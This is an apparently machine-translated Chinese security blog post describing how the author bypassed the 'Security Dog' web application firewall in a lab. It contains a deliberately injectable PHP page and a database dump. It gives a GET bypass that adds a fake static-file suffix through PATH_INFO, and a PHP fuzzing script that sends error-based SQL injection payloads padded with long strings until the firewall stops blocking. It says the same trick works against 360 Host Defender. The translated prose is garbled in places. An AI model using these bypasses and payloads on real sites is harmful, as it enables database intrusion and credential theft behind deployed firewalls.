Remember, 720 degrees, Thomas, circling a dog!

The Somalia of a sea thief

Source: Ichunqiu

This article is I Spring and Autumn Original award program, without permission to reprint!
Preface
A few days ago, the test bug hit the security dog, has been doing code audit there is no actual combat experience is not to be abused. Find some online methods, basically sealed with limited restrictions, there is no good way to common (of course, I am looking for the wrong posture). Yesterday a little time to specifically see the security of the dog logic to do some fuzz, the success of the bypass get and post injection defense, not particularly generic, when you share some ideas.

Body
test Environment
Windows Server 2003 Enterprise Edition Service Pack 2
apache/2.4.23 (Win32) openssl/1.0.2j php/5.4.45
Website Security Dog (Apache version) V3.5 Official edition

• 1. Main program version: 3.5.12048
• 2. Web Horse Library version: 2016-06-29

Test code
sqlin.php:

<?php$link = mysql_connect (' localhost ',' Root ',' Root '); mysql_select_db (' Anquangou ', $link); $sql =' SELECT * from ' user ' where ' id ' = '. $_request[' ID '];Echo $sql."<br>\n"; $result =mysql_query ($sql);while ($array = Mysql_fetch_assoc ($result)) {echo  "ID:". $array [ ' Id '].  "<br/>\n";  echo  "username:". $array [ ' username '].  "<br/>\n"; echo  " Password: ". $array [ ' password '].  "<br/>\n";} echo mysql_error ();         

Database:

# Host:localhost (version:5.5.53)# date:2016-11-19 17:57:30# Generator:mysql-front 5.3 (Build 4.234)/*!40101 SET NAMES UTF8 */;## Structure for table "Admin"#DROP TABLEIF EXISTS ' admin '; CREATE TABLE ' admin ' (' Id ' int (One) notNULL auto_increment, ' admin_name ' varchar (255)DEFAULTNULL, ' admin_pass ' varchar (255)DEFAULTNULL, PRIMARY KEY (' Id ')) Engine=myisam auto_increment=2DEFAULT Charset=utf8;## Data for table "Admin"#/*!40000 ALTER TABLE ' admin ' DISABLE KEYS * *; INSERT into ' admin ' VALUES (1,' Admin ',' admin888 ');/*!40000 ALTER TABLE ' admin ' ENABLE KEYS */;## Structure for table "user"#DROP TABLEIF EXISTS ' user '; CREATE TABLE ' user ' (' Id ' int (One) notNULL auto_increment, ' username ' varchar (255)DEFAULTNULL, ' password ' varchar (255)DEFAULTNULL, PRIMARY KEY (' Id ')) Engine=myisam auto_increment=3default Charset=utf8; ## Data For table "user" #/*!40000 ALTER TABLE ' user ' DISABLE KEYS */;insert into ' user ' VALUES (1, ' user ',  ' Userpass '), (2,  ' User2 ',  ' Upass2 '); /*!40000 ALTER TABLE ' user ' ENABLE KEYS */;     

Get-injection

Get-type injection in fact, there are not many places to move hands and feet, just a URL. The security dog does not disclose its own protection rules, but it has the ability to add rules, and it looks at the regular syntax. Guess the official Rules should also be regular. There are two options for bypassing:

1. If you bypass the regular match, the match failure will of course not be intercepted.

2. Bypass (or disrupt) the logic of the program. Without entering the matching logic, it will not intercept.

for regular bypass, without knowing the specific regular expression of the protection rules, it can only fuzz, a variety of interspersed with. But I'm trying the second way. The principle of the

Security dog is to inject a module into the Web Service, grab the HTTP request before the Web service is processed, and handle it according to the rules, and leave it to the Web service to continue processing, and then intercept and return the custom error message if there is a problem.
A simple test



fakefile.php does not actually exist, but will still be stopped by the security dog. Of course also includes PHP5 php4 ASP cer ASA and so on and so on, and so on and so on. 111 will intercept. However, there are exceptions, common static files (. js. jpg. swf. CSS, etc.) and it doesn't matter.

can see that there is no interception prompt but direct 404. So guess that the security dog should be similar to the white list mechanism, the specific static resource suffix request is not processed directly to the webserver this kind of processing seems to be no problem in fact there is a hidden danger Apache and IIS turn on PathInfo support to do a test by default.

the request for PHP is that the/pathinfo.css behind sqlin.php is path_info but the security dog seems to have pathinfo.css As a real request object, because it is a static resource, it simply throws the request to PHP without processing.
is this the second? Right.. Isn't so easy?
        
post-type injection
Post-type re-use PathInfo it's not going to make it. Because normal requests for static resources do not use post, so there is no white list. Any post request should be advanced the dog's mouth is going around, so just think of a way to fuzz it. Constructs a post script

<?php$i = 10000;$url =' http://192.168.1.121/sqlin.php ';for (;;) {$i + +;Echo"$i\ n ";$payload =' Id=-1 and (Extractvalue (1,concat (0x7e, (select User ()), 0x7e)) and 1= '. Str_repeat (' 3 ',$i);$ret =DoPost ($url,$payload);if (!strpos ($ret,' website firewall ') {Echo"done!\n". strlen ($payload)."\ n".$ret; Die ();}}functionDoPost ($url,$data =‘‘){$ch =curl_init (); curl_Setopt ($ch, Curlopt_url,$url); Curl_Setopt ($ch, Curlopt_post, 1); Curl_Setopt ( $ch, Curlopt_header, 0); Curl_setopt ( $ch, Curlopt_returntransfer, 1); Curl_setopt ( $ch, Curlopt_postfields,  $data);  $return = Curl_ exec ( $ch); Curl_close ( $ch); return  $return;}                 

Add an extra-long string after a normal injection statement However, it took a long time to stop. The script changes position to put the extra long string in the middle

$payload = ' id=-1 and 1= '. Str_repeat (' 3 ', $i). ' and (Extractvalue (1,concat (0x7e, (select User ()), 0x7e)) ';

Run.

WTF, another second? Try it in the browser


I just took off my pants, and you told me it was over.

PostScript

In fact, the actual testing process to be more complex, time relationship picked a successful step to write a pathinfo is actually a very easy to ignore the problem incidentally tested 360 of the host defender also has the same problem. And 360 of the host guard comes with white list and similar to Dede admin (background operation not defense) can be used
Http://example.com/index.php/admin/?id=sql injected this way to the second

More security technology, good quality, white hat hack big guy in: http://bbs.ichunqiu.com/portal.php

Remember, 720 degrees, Thomas, circling a dog!